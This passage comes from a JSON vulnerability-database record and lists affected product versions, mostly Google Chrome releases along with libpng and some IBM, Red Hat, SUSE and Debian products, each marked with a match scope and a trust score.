"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.48"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1652.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.627.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.826.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.581.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.130"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.42"
},
{
"_id": null,
"model": "enterprise linux workstation supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.124"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1295.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.922.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.113"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.638.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1049.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.219"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "41.0.2272.118"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.910.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.149"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.35"
},
{
"_id": null,
"model": "enterprise content management system monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3.0.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1686.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.671.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1055.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.84"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.66"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.898.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.48"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.107"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1004.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.136"
},
{
"_id": null,
"model": "websphere real time sr fp",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3920"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.935.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.821.0"
},
{
"_id": null,
"model": "security identity governance and intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.32"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.923.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "42.0.2311"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.57"
},
{
"_id": null,
"model": "websphere real time",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.948.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.114"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1024.0"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.784.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.48"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.34"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "46.0.2490.86"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1017.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.84"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.683.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.97"
},
{
"_id": null,
"model": "linux enterprise server sp4 ltss",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.747.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.333"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.775.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.99"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1077.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1300.0"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.889.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.133"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.61"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.773.0"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.157"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.739.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1028.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.95"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.24"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.658.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.761.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.690.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.103"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.44"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.660.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1676.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.108"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.137"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1669.1"
},
{
"_id": null,
"model": "websphere real time sr fp",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "3930"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.587.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "39.0.2171.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.861.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.717.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.880.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.607.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.61"
},
{
"_id": null,
"model": "cognos tm1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.923.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.232"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.778.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.655.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.115"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.579.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.694.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.116"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.669.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1671.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.702.0"
},
{
"_id": null,
"model": "decision optimization center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.8.0.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.62"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.592.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.902.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.104"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1272.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.32"
},
{
"_id": null,
"model": "chrome",
